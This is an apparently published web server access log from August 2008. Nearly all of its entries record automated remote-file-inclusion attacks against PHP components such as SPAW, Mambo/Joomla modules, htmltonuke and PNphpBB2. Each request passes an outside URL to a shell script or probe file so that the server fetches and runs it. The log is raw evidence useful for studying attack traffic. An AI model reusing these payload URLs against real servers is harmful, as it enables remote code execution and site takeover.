58.102.118.201 - - [10/Aug/2008:11:30:37 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:11:30:37 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:11:30:52 -0700] "GET /logs/access_080324.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:11:30:52 -0700] "GET /logs/access_080324.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:11:30:52 -0700] "GET /logs/access_080324.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:11:30:52 -0700] "GET /logs/access_080324.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:31:01 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:31:06 -0700] "GET /logs/access_080324.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:31:08 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:31:16 -0700] "GET /logs/access_080214.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:31:24 -0700] "GET /logs/access.log//index.php?name=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:31:28 -0700] "GET //index.php?name=http://www.avm.su/id.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:31:28 -0700] "GET /logs//index.php?name=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:11:31:46 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:11:31:46 -0700] "GET /logs/access_071228.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:11:31:46 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:11:31:46 -0700] "GET /logs/access_080324.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:11:32:40 -0700] "GET /logs/access_080507.log//htmltonuke.php?http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:11:32:40 -0700] "GET /logs/access_080507.log//htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:11:32:41 -0700] "GET /logs/access_080507.log//htmltonuke.php?http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.234.168 - - [10/Aug/2008:11:33:00 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.rajacademy.com/shop/blocks/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [10/Aug/2008:11:33:00 -0700] "GET /logs//main.php?sayfa=http://www.rajacademy.com/shop/blocks/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [10/Aug/2008:11:33:00 -0700] "GET //main.php?sayfa=http://www.rajacademy.com/shop/blocks/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:33:01 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:33:01 -0700] "GET /logs/access_080211.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:33:01 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:11:33:04 -0700] "GET /logs/access_080507.log//htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.234.168 - - [10/Aug/2008:11:33:06 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.rajacademy.com/shop/blocks/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:33:12 -0700] "GET /logs/access_080324.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:33:13 -0700] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:33:14 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:33:17 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:33:23 -0700] "GET /logs/access_080214.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:33:39 -0700] "GET /logs/access_080224.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:33:39 -0700] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:33:40 -0700] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:33:46 -0700] "GET /logs/access_080126.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:34:31 -0700] "GET /logs/access_080404.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:34:31 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:34:32 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:34:42 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:34:47 -0700] "GET /logs/access_080308.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:11:34:57 -0700] "GET /logs/access_080229.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.213.250.14 - - [10/Aug/2008:11:35:18 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
140.136.202.15 - - [10/Aug/2008:11:35:21 -0700] "GET /logs/access_080118.log/index.php?url=http://sekip.axspace.com/alat/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.136.202.15 - - [10/Aug/2008:11:35:22 -0700] "GET /index.php?url=http://sekip.axspace.com/alat/r0x.txt?? HTTP/1.1" 200 18383 "-" "libwww-perl/5.79" "www.dmulk.com"
140.136.202.15 - - [10/Aug/2008:11:35:23 -0700] "GET /logs/index.php?url=http://sekip.axspace.com/alat/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.74.183 - - [10/Aug/2008:11:35:26 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.29.74.183 - - [10/Aug/2008:11:35:26 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.29.74.183 - - [10/Aug/2008:11:35:31 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.29.74.183 - - [10/Aug/2008:11:35:31 -0700] "GET /logs/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:35:42 -0700] "GET /logs/access_080124.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:35:43 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:35:43 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.231.0.98 - - [10/Aug/2008:11:35:44 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ttvf.org/chat/inc/cmses/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:35:52 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:35:52 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:35:56 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:35:56 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:11:35:57 -0700] "GET /logs/access_080105.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:36:12 -0700] "GET /logs/access_080123.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:36:26 -0700] "GET //photoalb/lib/static/header.php?set_menu=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:36:27 -0700] "GET /logs/access_080218.log//photoalb/lib/static/header.php?set_menu=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:36:28 -0700] "GET /logs//photoalb/lib/static/header.php?set_menu=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:36:43 -0700] "GET /logs/access_080127.log//photoalb/lib/static/header.php?set_menu=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.182.98 - - [10/Aug/2008:11:36:51 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
70.84.182.98 - - [10/Aug/2008:11:36:56 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:37:16 -0700] "GET /logs/access_080213.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:37:17 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:37:17 -0700] "GET /logs/access_080213.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:37:17 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:37:17 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:37:18 -0700] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:37:18 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:37:18 -0700] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:11:37:20 -0700] "GET /logs/access_080118.log//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:37:27 -0700] "GET /logs/access_080124.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:37:28 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:37:28 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.61 - - [10/Aug/2008:11:37:29 -0700] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.61 - - [10/Aug/2008:11:37:29 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.61 - - [10/Aug/2008:11:37:29 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.61 - - [10/Aug/2008:11:37:29 -0700] "GET /logs/access_080213.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.102.100 - - [10/Aug/2008:11:38:15 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.85.102.100 - - [10/Aug/2008:11:38:15 -0700] "GET /errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
59.126.46.141 - - [10/Aug/2008:11:38:24 -0700] "GET //htmltonuke.php?http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
59.126.46.141 - - [10/Aug/2008:11:38:25 -0700] "GET /logs//htmltonuke.php?http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:38:46 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:38:46 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:38:46 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [10/Aug/2008:11:38:55 -0700] "GET /logs/access_080219.log%20//main.php?sayfa=http://www.rajacademy.com/shop/blocks/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.85.102.132 - - [10/Aug/2008:11:39:10 -0700] "GET /errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
70.85.102.132 - - [10/Aug/2008:11:39:11 -0700] "GET /logs/errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:39:12 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:39:14 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:39:14 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:39:14 -0700] "GET /logs/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:39:19 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:39:21 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:39:21 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:39:21 -0700] "GET /logs/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:11:40:20 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:11:40:21 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.98.87.14 - - [10/Aug/2008:11:40:44 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.98.87.14 - - [10/Aug/2008:11:40:44 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.55.243.132 - - [10/Aug/2008:11:40:45 -0700] "GET /logs/access.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
195.55.243.132 - - [10/Aug/2008:11:40:46 -0700] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
203.98.87.14 - - [10/Aug/2008:11:40:56 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.98.87.14 - - [10/Aug/2008:11:40:57 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.169.0.50 - - [10/Aug/2008:11:41:17 -0700] "GET /logs/access_080209.log//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.169.0.50 - - [10/Aug/2008:11:41:17 -0700] "GET //squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.169.0.50 - - [10/Aug/2008:11:41:18 -0700] "GET /logs//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
